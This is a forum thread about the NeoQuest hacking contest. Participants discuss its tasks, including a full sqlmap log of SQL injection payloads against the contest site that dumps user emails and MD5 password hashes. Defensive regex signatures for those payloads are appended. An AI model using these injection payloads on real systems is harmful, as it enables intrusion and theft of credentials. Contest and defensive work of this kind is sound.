NeoQuest - 2012: registration is open

Discussion in 'Tasks/Quests/CTF/Contests' started by e_Raud, 22 Feb 2012.

  1. e_Raud

    e_Raud New Member

    Joined:
    21 Feb 2012
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    I am glad (and proud) to present this year's first hack quest from our company. I hope you find it worthwhile.


    NeoBIT announces the start of participant registration for the hack quest
    NeoQUEST-2012

    http://neoquest.ru/

    Participants in the hack quest will rack their brains over a variety of information security problems: the security of SCADA systems, cryptanalysis, steganography, the security of the Windows and Linux operating systems, and program disassembly, and will try their hand at web hacking and reverse engineering.

    It doesn't matter whether information security is your job or your hobby. If you can outwit an opponent by finding a gap in their defenses that they don't even suspect, this quest is for you. It will let you demonstrate your level and have a great deal of fun from hacking with impunity.

    The grand prize of the first stage of our contest is a MacBook Pro laptop.

    Participant registration begins on 21 February 2012
    The game starts on 1 March 2012
    All information about the quest and the beginning of the "legend" is provided upon registration
     
  2. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    I just bought a laptop :D
     
  3. Lilo

    Lilo Banned

    Joined:
    10 Mar 2009
    Messages:
    462
    Likes Received:
    784
    Reputations:
    313
    Let's play
    Level 1
    They give the domain 178.250.245.27
    You need to find info about the guy


     
  4. [none]

    [none] Banned

    Joined:
    22 Nov 2009
    Messages:
    83
    Likes Received:
    26
    Reputations:
    -6
    Found him, put him in the trunk, driving to the basement to beat the info out of him
     
  5. Root-access

    Root-access Elder

    Joined:
    18 Jun 2008
    Messages:
    193
    Likes Received:
    195
    Reputations:
    91
    Lolwut? You're actually supposed to pull the data out of the DB there.
     
  6. Lilo

    Lilo Banned

    Joined:
    10 Mar 2009
    Messages:
    462
    Likes Received:
    784
    Reputations:
    313
    I've already done it
     
  7. Ups

    Ups Member

    Joined:
    11 Apr 2011
    Messages:
    113
    Likes Received:
    12
    Reputations:
    0
    500 Internal Server Error :(
     
  8. Yzy

    Yzy New Member

    Joined:
    8 May 2009
    Messages:
    110
    Likes Received:
    3
    Reputations:
    0
    And when will the quest be brought back?
     
  9. SilavoMne

    SilavoMne New Member

    Joined:
    10 Jan 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Waiting for the quest..... for the 3rd day already....
     
  10. e_Raud

    e_Raud New Member

    Joined:
    21 Feb 2012
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    :) All good, we're bringing the quest back! Fresh and updated.

    The registration form is here, and a short description of the rules and bonuses is on our blog: http://habrahabr.ru/company/neobit/blog/166513/
    Enjoy the playthrough
     
  11. aflower

    aflower New Member

    Joined:
    9 Feb 2013
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    NEOQUEST 2013 neoquest.ru
    So, what we have: a DB dump for task 1
    root@cloudbackup:~/sqlmap# python sqlmap.py -u "http://rosquest.ru/index.php?url=6"

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting at 07:21:29

    [07:21:29] [INFO] testing connection to the target url
    [07:21:29] [INFO] heuristics detected web page charset 'ascii'
    [07:21:29] [INFO] testing if the url is stable, wait a few seconds
    [07:21:30] [WARNING] url is not stable, sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
    how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
    [07:21:38] [INFO] testing if GET parameter 'url' is dynamic
    [07:21:38] [WARNING] GET parameter 'url' does not appear dynamic
    [07:21:38] [WARNING] reflective value(s) found and filtering out
    [07:21:38] [INFO] heuristic (parsing) test shows that GET parameter 'url' might be injectable (possible DBMS: 'MySQL')
    [07:21:38] [INFO] testing for SQL injection on GET parameter 'url'
    heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
    do you want to include all tests for 'MySQL' ignoring provided level (1) and risk (1)? [Y/n] Y
    [07:21:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [07:21:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
    [07:21:53] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
    [07:21:54] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)'
    [07:21:54] [INFO] GET parameter 'url' is 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)' injectable
    [07:21:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
    [07:21:55] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
    [07:21:55] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
    [07:21:55] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
    [07:21:55] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
    [07:21:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'
    [07:21:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'
    [07:21:55] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
    [07:21:56] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
    [07:21:57] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
    [07:21:57] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
    [07:21:57] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
    [07:21:57] [INFO] testing 'MySQL inline queries'
    [07:21:57] [INFO] testing 'MySQL > 5.0.11 stacked queries'
    [07:21:57] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
    [07:21:57] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
    [07:22:07] [INFO] GET parameter 'url' is 'MySQL > 5.0.11 AND time-based blind' injectable
    [07:22:07] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
    [07:22:07] [INFO] automatically exten
    07.02.13
    [INFO] target url appears to have 2 columns in query
    [07:22:08] [INFO] GET parameter 'url' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
    GET parameter 'url' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
    sqlmap identified the following injection points with a total of 74 HTTP(s) requests:
    ---
    Place: GET
    Parameter: url
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: url=6 RLIKE IF(4438=4438,6,0x28)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: url=-6866 UNION ALL SELECT NULL,CONCAT(0x3a6266613a,0x43456773575656536753,0x3a6d73703a)#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: url=6 AND SLEEP(5)
    ---
    [07:22:15] [INFO] the back-end DBMS is MySQL
    web application technology: Nginx, PHP 5.3.10
    back-end DBMS: MySQL 5.0.11
    [07:22:15] [INFO] fetched data logged to text files under 'output/rosquest.ru'

    [*] shutting down at 07:22:15
    [07:25:03] [INFO] testing MySQL
    [07:25:03] [WARNING] reflective value(s) found and filtering out
    [07:25:03] [INFO] confirming MySQL
    [07:25:03] [INFO] the back-end DBMS is MySQL
    [07:25:03] [INFO] fetching banner
    [07:25:03] [INFO] actively fingerprinting MySQL
    [07:25:04] [INFO] executing MySQL comment injection fingerprint
    web application technology: Nginx, PHP 5.3.10
    back-end DBMS: active fingerprint: MySQL >= 5.1.12 and < 5.5.0
    banner: '5.1.58'
    [07:25:09] [INFO] fetching current user
    current user: 'neoquest_web@localhost'
    [07:25:09] [INFO] fetching database users password hashes
    [07:25:09] [WARNING] the SQL query provided does not return any output
    [07:25:09] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'
    [07:25:09] [INFO] fetching database users
    [07:25:10] [INFO] the SQL query used returns 1 entries
    [07:25:10] [INFO] retrieved: "'neoquest_web'@'localhost'"
    [07:25:10] [INFO] fetching number of password hashes for user 'neoquest_web'
    [07:25:10] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
    [07:25:10] [INFO] retrieved:
    [07:25:10] [INFO] retrieved:
    [07:25:10] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads

    [07:25:10] [WARNING] unable to retrieve the number of password hashes for user 'neoquest_web'
    [07:25:10] [CRITICAL] unable to retrieve the password hashes for the database users (most probably because the session user has no read privileges over the relevant system database table)
    [07:25:10] [INFO] fetching database names
    [07:25:10] [INFO] the SQL query used returns 2 entries
    [07:25:11] [INFO] retrieved: "information_schema"
    [07:25:11] [INFO] retrieved: "neoquest_web"
    [07:25:11] [INFO] fetching tables for databases: 'information_schema, neoquest_web'
    [07:25:11] [INFO] skipping system databases 'information_schema, mysql'
    [07:25:11] [INFO] the SQL query used returns 3 entries
    [07:25:11] [INFO] retrieved: "neoquest_web","94fhdi54g8rinnf5548581fjhgdt"
    [07:25:11] [INFO] retrieved: "neoquest_web","location"
    [07:25:12] [INFO] retrieved: "neoquest_web","users"
    Database: neoquest_web
    [3 tables]
    +------------------------------+
    | 94fhdi54g8rinnf5548581fjhgdt |
    | location |
    | users |
    +------------------------------+

    [07:25:12] [INFO] fetched data logged to text files under 'output/rosquest.ru'
    DAMN!
    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
    ---
    Place: GET
    Parameter: url
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: url=6 RLIKE IF(4438=4438,6,0x28)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: url=-6866 UNION ALL SELECT NULL,CONCAT(0x3a6266613a,0x43456773575656536753,0x3a6d73703a)#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: url=6 AND SLEEP(5)
    ---
    [07:28:14] [INFO] the back-end DBMS is MySQL
    web application technology: Nginx, PHP 5.3.10
    back-end DBMS: MySQL 5
    [07:28:14] [INFO] fetching columns for table 'users' in database 'neoquest_web'
    [07:28:15] [WARNING] reflective value(s) found and filtering out
    [07:28:15] [INFO] the SQL query used returns 3 entries
    [07:28:15] [INFO] retrieved: "id","int(11)"
    [07:28:15] [INFO] retrieved: "email","varchar(40)"
    [07:28:16] [INFO] retrieved: "role","varchar(50)"
    [07:28:16] [INFO] fetching entries for table 'users' in database 'neoquest_web'
    [07:28:16] [INFO] the SQL query used returns 10 entries
    [07:28:16] [INFO] retrieved: "[email protected]","1","Manager"
    [07:28:16] [INFO] retrieved: "[email protected]","2","Admin"
    [07:28:16] [INFO] retrieved: "[email protected]","3","Admin"
    [07:28:16] [INFO] retrieved: "[email protected]","4","Accountant"
    [07:28:17] [INFO] retrieved: "[email protected]","5","Admin"
    [07:28:17] [INFO] retrieved: "[email protected]","6","Admin"
    [07:28:17] [INFO] retrieved: "[email protected]","7","User"
    [07:28:17] [INFO] retrieved: "[email protected]","8","Admin"
    [07:28:17] [INFO] retrieved: "[email protected]","9","Admin"
    [07:28:17] [INFO] retrieved: "[email protected]","10","Admin"
    [07:28:17] [INFO] analyzing table dump for possible password hashes
    Database: neoquest_web
    Table: users
    [10 entries]
    +----+------------+--------------------------------+
    | id | role | email |
    +----+------------+--------------------------------+
    | 1 | Manager | [email protected] |
    | 2 | Admin | [email protected] |
    | 3 | Admin | [email protected] |
    | 4 | Accountant | [email protected] |
    | 5 | Admin | [email protected] |
    | 6 | Admin | [email protected] |
    | 7 | User | [email protected] |
    | 8 | Admin | [email protected] |
    | 9 | Admin | [email protected] |
    | 10 | Admin | [email protected] |
    +----+------------+--------------------------------+

    [07:28:17] [INFO] table 'neoquest_web.users' dumped to CSV file 'output/rosquest.ru/dump/neoquest_web/users.csv'
    [07:28:17] [INFO] fetched data logged to text files under 'output/rosquest.ru'
    I did it )))

    We have the emails of everyone in the DB and their hashed passwords
    [08:13:02] [INFO] fetching entries for table '94fhdi54g8rinnf5548581fjhgdt' in database 'neoquest_web'
    [08:13:02] [INFO] the SQL query used returns 7 entries
    [08:13:02] [INFO] retrieved: "[email protected]","4f507829e3f2a72b4df9de064df76e69","1"
    [08:13:02] [INFO] retrieved: "[email protected]","ecb67dd66dd44f787c15d7d231402783","2"
    [08:13:02] [INFO] retrieved: "[email protected]","aefebf534eb346df845beb0d72a1fdde","3"
    [08:13:02] [INFO] retrieved: "[email protected]","9de638c88a6e61d44fd29b6f48ef879b","4"
    [08:13:02] [INFO] retrieved: "[email protected]","50caceceaf185a26cad1ac0bb51fe6ad","5"
    [08:13:03] [INFO] retrieved: "[email protected]","0e4a8027f7d9d9b03e01360cc43c26a9","6"
    [08:13:03] [INFO] retrieved: "[email protected]","bb9030adff799137c670ca3080399542","7"
    [08:13:03] [INFO] analyzing table dump for possible password hashes
    [08:13:03] [INFO] recognized possible password hashes in column 'adm_pass'

    Here is what we have on the MP3 player task:
    at the beginning, when the recording is sped up and reversed, there is the word РАМ; then in the middle there is Morse code that decodes to ГЕНАЕ; then at the end, if you split the recording into channels, Morse for ИНИ can be heard in the right channel. Out of this jumble there should come a single meaningful word, and the answer will be its MD5 hash sum.

    And the task with the snowboarders,
    with the pHash: well, I drew the correct 8 by 8 picture and made it grayscale; how do I find out that pHash? And what are those digits after the # on the ski pass, how are they relevant?

    Join in, let's think together)

    Added 9 minutes 23 seconds later:
    Presumably the credit card number will be 4701-5959-2764-8440
    But first you need to log in on the airline's site

    Added 1 minute 24 seconds later:
    РАМ, then comes the Morse code [--.] [.] [-.] [..] [.] and the second one, in the right audio channel, [..] [-.] [..]
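
As an added example (not part of the original post and not sqlmap's own code): a log check a defender could run for the three payload types listed in the sqlmap report above. The access-log lines are constructed, and treating `url` as a digits-only parameter is an assumption inferred from `url=6`.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Signatures for the three payload types in the sqlmap report above.
SIGNATURES = {
    "boolean-blind (RLIKE IF)": re.compile(r"\bRLIKE\s+IF\s*\(", re.I),
    "union-query": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "time-blind (SLEEP)": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
}
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (not from the page); client IPs are documentation addresses.
SAMPLE_LOG = """\
203.0.113.9 - - [07/Feb/2013:07:20:01 +0000] "GET /index.php?url=6 HTTP/1.1" 200 812
198.51.100.7 - - [07/Feb/2013:07:21:54 +0000] "GET /index.php?url=6%20RLIKE%20IF(4438%3D4438,6,0x28) HTTP/1.1" 200 812
198.51.100.7 - - [07/Feb/2013:07:22:07 +0000] "GET /index.php?url=6%20AND%20SLEEP(5) HTTP/1.1" 200 812
198.51.100.7 - - [07/Feb/2013:07:22:08 +0000] "GET /index.php?url=-6866%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x3a6266613a,0x43456773575656536753,0x3a6d73703a)%23 HTTP/1.1" 200 90
198.51.100.7 - - [07/Feb/2013:07:22:09 +0000] "GET /index.php?url=6%27 HTTP/1.1" 500 0
"""


def classify(value):
    """Return the names of all signatures found in a decoded parameter value."""
    return [name for name, rx in SIGNATURES.items() if rx.search(value)]


def scan(log_text, param="url"):
    """Return (line number, client IP, reasons) for each suspicious request."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        # parse_qsl percent-decodes values, so the regexes see the real payload.
        for key, value in parse_qsl(query, keep_blank_values=True):
            # Assumption: `param` is an integer id, so plain digits are benign.
            if key == param and not value.isdigit():
                reasons = classify(value) or ["non-numeric value"]
                findings.append((lineno, line.split()[0], reasons))
    return findings


if __name__ == "__main__":
    for lineno, client, reasons in scan(SAMPLE_LOG):
        print(f"line {lineno}: {client}: {', '.join(reasons)}")
```

The digits-only check catches probes that match no signature, such as the stray quote on the last sample line; the same constraint enforced in the application (an integer cast plus a parameterized query) removes the injection point itself.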